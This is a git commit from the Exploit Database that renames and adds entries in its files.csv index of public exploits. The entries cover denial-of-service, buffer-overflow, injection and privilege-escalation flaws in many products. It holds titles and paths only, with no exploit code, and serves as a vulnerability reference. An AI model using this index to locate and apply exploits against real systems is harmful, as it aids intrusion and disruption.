DB: 2017-10-12

5 new exploits

MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit

Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities
Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities

Apple Safari & QuickTime - Denial of Service
Apple Safari / QuickTime - Denial of Service

Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities
Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities

Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities
Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities

Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service
Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service

Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities
Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities

Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow
Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow

Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption
Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption

Mozilla Firefox - Interleaving document.write and appendChild Denial of Service
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service

Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service
Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service

BRS Webweaver 1.0 4 - POST and HEAD Denial of Service
BRS Webweaver 1.0 4 - POST / HEAD Denial of Service

Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service

Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service
Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service

Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities
Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities

Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow
Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow

Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption
Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption

Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption
Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption

Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)
Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)

Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption
Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption

Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)
Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)

Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys
Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys

binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow

BSD & Linux umount - Privilege Escalation
BSD / Linux - 'umount'  Privilege Escalation

BSD & Linux lpr - Privilege Escalation
BSD / Linux - 'lpr' Privilege Escalation

DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure
DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure

SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption
SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption

Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation
Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation

ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)
ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)
ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow

Microsoft Windows - WINS Vulnerability and OS/SP Scanner
Microsoft Windows - WINS Vulnerability + OS/SP Scanner

Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)
Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit

Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)

Quest InTrust 10.4.x - ReportTree and SimpleTree Classes
Quest InTrust 10.4.x - ReportTree / SimpleTree Classes

SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS
SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit

RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd
RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd

Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files
Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files

tcpdump 3.4 - Protocol Four and Zero Header Length
tcpdump 3.4 - Protocol Four / Zero Header Length

Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow
Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow

Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit
Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit

Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password
Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password

Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure
Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure

WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow
WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow

EFTP Server 2.0.7.337 - Directory and File Existence
EFTP Server 2.0.7.337 - Directory Existence / File Existence

Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting
Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting

InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities
InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities

Microsoft Windows XP - Help And Support Center Interface Spoofing
Microsoft Windows XP - Help and Support Center Interface Spoofing

BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)
BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)

Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure
Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure

Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting
Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting

3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal
3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal

Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting
Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting

Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read
Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read

Github Enterprise - Default Session Secret And Deserialization (Metasploit)
Github Enterprise - Default Session Secret and Deserialization (Metasploit)

VX Search Enterprise 10.1.12 - Buffer Overflow

QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities
Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities

Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion
Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion

FlexPHPNews 0.0.6 & PRO - Authentication Bypass
FlexPHPNews 0.0.6 / PRO - Authentication Bypass

click&rank - SQL Injection / Cross-Site Scripting
Click&Rank - SQL Injection / Cross-Site Scripting

WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures
WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures

PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass
Pre Hotels&Resorts Management System - Authentication Bypass

PHP-Nuke CMS - (Survey and Poll) SQL Injection
PHP-Nuke CMS (Survey and Poll) - SQL Injection

60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)
60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)

XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup
XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup

Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)
Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)

Sun i-Runbook 2.5.2 - Directory And File Content Disclosure
Sun i-Runbook 2.5.2 - Directory and File Content Disclosure

DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification
DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification
DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection
DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection
DUforum 3.x - 'messages.asp FOR_ID' SQL Injection
DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection

SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation

JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion
JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion

WordPress Plugin WP BackupPlus - Database And Files Backup Download
WordPress Plugin WP BackupPlus - Database and Files Backup Download

WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities
WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection

Gogs - (users and repos q pararm) SQL Injection
Gogs - users and repos q SQL Injection

WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection

Joomla! Component 'com_tree' - 'key' Parameter SQL Injection
Joomla! Component com_tree - 'key' Parameter SQL Injection

Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities
WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities

Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities
Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities

TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)
TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)
up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit
up.time 7.5.0 - Upload And Execute File Exploit
up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit
up.time 7.5.0 - Upload and Execute Exploit

Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass
Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass

WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting
WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting

WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting
WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting

WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting
WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting
Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
This commit is contained in:
Offensive Security 2017-10-12 05:01:34 +00:00
parent b77b178de0
commit 3cfdd1cc27
8 changed files with 737 additions and 86 deletions

173
files.csv
View file

@ -227,7 +227,7 @@ id,file,description,date,author,platform,type,port
1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos,0
1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0
1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos,0
1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,windows,dos,0
1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0
@ -927,7 +927,7 @@ id,file,description,date,author,platform,type,port
7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0
7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0
7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0
@ -1073,7 +1073,7 @@ id,file,description,date,author,platform,type,port
8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0
8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",multiple,dos,0
8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0
8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
8957,platforms/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0
8964,platforms/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0
8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0
@ -1116,7 +1116,7 @@ id,file,description,date,author,platform,type,port
9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0
9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0
9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0
@ -1242,7 +1242,7 @@ id,file,description,date,author,platform,type,port
10068,platforms/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21
10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
@ -1317,7 +1317,7 @@ id,file,description,date,author,platform,type,port
10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Exploit",2010-01-02,"fl0 fl0w",windows,dos,0
10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,hardware,dos,0
10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0
11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0
@ -1395,7 +1395,7 @@ id,file,description,date,author,platform,type,port
11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0
11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0
11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0
11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0
11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0
@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port
14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
14282,platforms/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
@ -1709,7 +1709,7 @@ id,file,description,date,author,platform,type,port
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0
14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0
14987,platforms/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0
@ -1769,7 +1769,7 @@ id,file,description,date,author,platform,type,port
15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0
15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0
15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0
@ -2451,7 +2451,7 @@ id,file,description,date,author,platform,type,port
20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0
20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0
20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",hardware,dos,0
20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0
20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,hardware,dos,0
@ -2868,14 +2868,14 @@ id,file,description,date,author,platform,type,port
22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,windows,dos,0
22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos,0
22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST / HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",windows,dos,0
22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash (PoC)",2012-11-12,coolkaveh,windows,dos,0
22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0
22666,platforms/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,windows,dos,0
22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos,0
22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos,0
22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0
22680,platforms/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
22681,platforms/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
@ -3491,7 +3491,7 @@ id,file,description,date,author,platform,type,port
27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0
